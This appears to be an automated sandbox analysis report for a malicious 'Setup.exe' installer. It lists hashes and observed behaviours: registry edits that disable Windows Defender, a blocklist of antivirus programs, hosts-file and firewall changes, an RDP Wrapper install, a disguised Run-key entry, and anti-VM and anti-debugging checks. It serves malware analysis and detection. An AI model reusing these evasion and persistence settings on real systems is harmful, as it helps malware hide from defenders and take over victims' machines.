Analysis
max time kernel: 120s
max time network: 125s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 14-06-2024 17:43
Behavioral task: behavioral1
Sample: Setup-pass-2024/Setup.exe
Resource: win7-20240508-en

Behavioral task: behavioral2
Sample: Setup-pass-2024/Setup.exe
Resource: win10v2004-20240508-en
General
Target: Setup-pass-2024/Setup.exe
Size: 4.2MB
MD5: 320e2e055e06df0aca09643116b3ef89
SHA1: cfc8e9f6140a9b04f8a3b240bbace0ec845a3196
SHA256: 838f122a6e751fb3ffd45c48ea86374b0938ac70ffb6e05b1715f2de1f9bb04e
SHA512: 5b40dcee0f08dd52cf9339197af1e19cbd99e576c8ece9eabefe4caf2fbfb11d95541035c1940c0017d1a020bfe9b14d5889d39610ee205809ab4b3982af34ae
SSDEEP: 98304:t4mwM0MziYrBZUt8qxSiUIHrCPmYs3wP46U9Fu2DpECdko5M7gfYF:Wq0Wb0P6ILFW6uIEAE7g4
Malware Config
Signatures
Processes: KMS.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | KMS.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | KMS.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | KMS.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | KMS.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | KMS.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | KMS.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" | KMS.exe
Processes: KMS.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | KMS.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications | KMS.exe
Grants admin privileges [1 TTP]
Uses net.exe to modify the user's privileges.
Identifies VirtualBox via ACPI registry values (likely anti-VM) [2 TTPs, 6 IoCs]
Processes: Setup.exe, KMS.exe, update.exe, smss.exe, IP.exe, unsecapp.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | Setup.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | KMS.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | update.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | smss.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | IP.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | unsecapp.exe
Blocks application from running via registry modification [28 IoCs]
Adds application to list of disallowed applications.
Processes: KMS.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | KMS.exe
  Key created | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "cureit.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" | KMS.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" | KMS.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" | KMS.exe
Drops file in Drivers directory [1 IoC]
Processes: cmd.exe
  description | ioc | process
  File opened for modification | C:\Windows\System32\drivers\etc\hosts | cmd.exe
Modifies Windows Firewall [2 TTPs, 1 IoC]
Processes: netsh.exe
  pid | process
  2640 | netsh.exe
Sets DLL path for service in the registry [2 TTPs, 1 IoC]
Processes: RDPWinst.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | RDPWinst.exe
Checks BIOS information in registry [2 TTPs, 12 IoCs]
BIOS information is often read in order to detect sandboxing environments.
Processes: update.exe, smss.exe, IP.exe, Setup.exe, KMS.exe, unsecapp.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | update.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | smss.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | smss.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | IP.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Setup.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Setup.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | KMS.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | unsecapp.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | unsecapp.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | KMS.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | update.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | IP.exe
Executes dropped EXE [13 IoCs]
Processes: install.exe, KMS.exe, update.exe, win.exe, svchost.exe, IP.exe, smss.exe, winserv.exe (4 instances), unsecapp.exe, RDPWinst.exe
  pid | process
  4504 | install.exe
  1272 | KMS.exe
  3708 | update.exe
  3328 | win.exe
  3912 | svchost.exe
  2304 | IP.exe
  2732 | smss.exe
  3812 | winserv.exe
  2860 | winserv.exe
  1636 | winserv.exe
  1320 | winserv.exe
  1944 | unsecapp.exe
  1372 | RDPWinst.exe
Loads dropped DLL [1 IoC]
Processes: svchost.exe
  pid | process
  3932 | svchost.exe
Modifies file permissions [1 TTP, 64 IoCs]
Processes: icacls.exe (64 instances)
  pid | process (every row is icacls.exe; pids listed in report order)
  1616, 1548, 2212, 2724, 4060, 4416, 3332, 4080, 4492, 4752,
  456, 3440, 1384, 5032, 2476, 4076, 788, 956, 1380, 5052,
  5028, 1872, 1544, 3980, 4528, 1544, 4504, 3404, 1872, 4784,
  4748, 3924, 2472, 3824, 864, 2580, 3604, 1472, 2492, 1960,
  1800, 2724, 3928, 3364, 2252, 4412, 3328, 3604, 4512, 3784,
  4800, 4648, 1492, 3116, 4768, 392, 4256, 2700, 1092, 1724,
  864, 1072, 4000, 3024
Processes:
  resource | yara_rule
  behavioral3/memory/1804-0-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-2-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  C:\ProgramData\Setup\KMS.exe | themida
  behavioral3/memory/1272-37-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-38-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | themida
  behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/3708-51-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-52-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  C:\ProgramData\Setup\IP.exe | themida
  C:\ProgramData\Setup\smss.exe | themida
  behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2732-122-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2304-137-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  C:\Windows\SysWOW64\unsecapp.exe | themida
  behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | themida
  behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | themida
  behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | themida
  behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | themida
  behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
  behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
  behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
  behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
  behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
  behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | themida
Adds Run key to start application [2 TTPs, 1 IoC]
Processes: IP.exe
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | IP.exe
Processes: Setup.exe, KMS.exe, update.exe, IP.exe, smss.exe, unsecapp.exe
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Setup.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | KMS.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | update.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | IP.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | smss.exe
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | unsecapp.exe
Looks up external IP address via web service [1 IoC]
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  1 | ip-api.com
Modifies WinLogon [2 TTPs, 1 IoC]
Processes: RDPWinst.exe
  description | ioc | process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | RDPWinst.exe
AutoIT Executable [52 IoCs]
AutoIT scripts compiled to PE executables.
Processes:
  resource | yara_rule
  behavioral3/memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmp | autoit_exe
  behavioral3/memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/3708-54-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/3708-53-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/3708-55-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/3708-56-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/3708-58-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/3708-60-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/3708-62-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/3708-86-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/3708-87-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/2732-123-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2732-124-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2732-125-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2732-128-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2732-127-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2732-126-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2304-138-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2304-141-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2304-146-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2304-139-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmp | autoit_exe
  behavioral3/memory/3708-176-0x00007FF78DEC0000-0x00007FF78EEC0000-memory.dmp | autoit_exe
  behavioral3/memory/2304-177-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/2732-178-0x00007FF68A010000-0x00007FF68B043000-memory.dmp | autoit_exe
  behavioral3/memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmp | autoit_exe
  behavioral3/memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
  behavioral3/memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
  behavioral3/memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
  behavioral3/memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
  behavioral3/memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
  behavioral3/memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmp | autoit_exe
Drops file in System32 directory [3 IoCs]
Processes: IP.exe, RDPWinst.exe
  description | ioc | process
  File created | C:\Windows\SysWOW64\unsecapp.exe | IP.exe
  File opened for modification | C:\Windows\SysWOW64\unsecapp.exe | IP.exe
  File created | C:\Windows\System32\rfxvmt.dll | RDPWinst.exe
Suspicious use of NtSetInformationThreadHideFromDebugger [6 IoCs]
Processes: Setup.exe, KMS.exe, update.exe, IP.exe, smss.exe, unsecapp.exe
  pid | process
  1804 | Setup.exe
  1272 | KMS.exe
  3708 | update.exe
  2304 | IP.exe
  2732 | smss.exe
  1944 | unsecapp.exe
Drops file in Program Files directory [46 IoCs]
Processes: update.exe, smss.exe, RDPWinst.exe
  description | ioc | process
  File opened for modification | C:\Program Files\AVG | update.exe
  File opened for modification | C:\Program Files\Kaspersky Lab | update.exe
  File opened for modification | C:\Program Files (x86)\IObit\IObit Malware Fighter | update.exe
  File opened for modification | C:\Program Files (x86)\SpeedFan | update.exe
  File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | smss.exe
  File opened for modification | C:\Program Files\Enigma Software Group | update.exe
  File opened for modification | C:\Program Files\AVAST Software | update.exe
  File opened for modification | C:\Program Files (x86)\Cezurity | update.exe
  File opened for modification | C:\Program Files (x86)\IObit\Advanced SystemCare | update.exe
  File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | RDPWinst.exe
  File opened for modification | C:\Program Files\ByteFence | update.exe
  File opened for modification | C:\Program Files\Bitdefender Agent | update.exe
  File opened for modification | C:\Program Files\RogueKiller | update.exe
  File opened for modification | C:\Program Files (x86)\360 | update.exe
  File opened for modification | C:\Program Files\Malwarebytes | update.exe
  File opened for modification | C:\Program Files\DrWeb | update.exe
  File opened for modification | C:\Program Files\COMODO | update.exe
  File opened for modification | C:\Program Files (x86)\AVG | update.exe
  File opened for modification | C:\Program Files\Common Files\Doctor Web | update.exe
  File opened for modification | C:\Program Files (x86)\Kaspersky Lab | update.exe
  File opened for modification | C:\Program Files\Common Files\McAfee | update.exe
  File opened for modification | C:\Program Files\ESET | update.exe
  File opened for modification | C:\Program Files\EnigmaSoft | update.exe
  File opened for modification | C:\Program Files (x86)\GPU Temp | update.exe
  File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | RDPWinst.exe
  File opened for modification | C:\Program Files (x86)\SpyHunter | update.exe
  File opened for modification | C:\Program Files (x86)\AVAST Software | update.exe
  File opened for modification | C:\Program Files\Loaris Trojan Remover | update.exe
  File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | update.exe
  File opened for modification | C:\Program Files\Ravantivirus | update.exe
  File opened for modification | C:\Program Files (x86)\IObit | update.exe
  File opened for modification | C:\Program Files (x86)\Transmission | update.exe
  File opened for modification | C:\Program Files (x86)\Microsoft JDX | update.exe
  File opened for modification | C:\Program Files\Common Files\AV | update.exe
  File opened for modification | C:\Program Files\Rainmeter | update.exe
  File opened for modification | C:\Program Files\Process Hacker 2 | update.exe
  File opened for modification | C:\Program Files (x86)\Moo0 | update.exe
  File opened for modification | C:\Program Files (x86)\Panda Security | update.exe
  File opened for modification | C:\Program Files\SUPERAntiSpyware | update.exe
  File created | C:\Program Files\Common Files\System\iediagcmd.exe | update.exe
  File opened for modification | C:\Program Files\SpyHunter | update.exe
  File opened for modification | C:\Program Files\Process Lasso | update.exe
  File opened for modification | C:\Program Files\Transmission | update.exe
  File opened for modification | C:\Program Files\RDP Wrapper | smss.exe
  File opened for modification | C:\Program Files\HitmanPro | update.exe
  File opened for modification | C:\Program Files\Cezurity | update.exe
Enumerates physical storage devices [1 TTP]
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry [2 TTPs, 2 IoCs]
Processor information is often read in order to detect sandboxing environments.
Processes: smss.exe
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | smss.exe
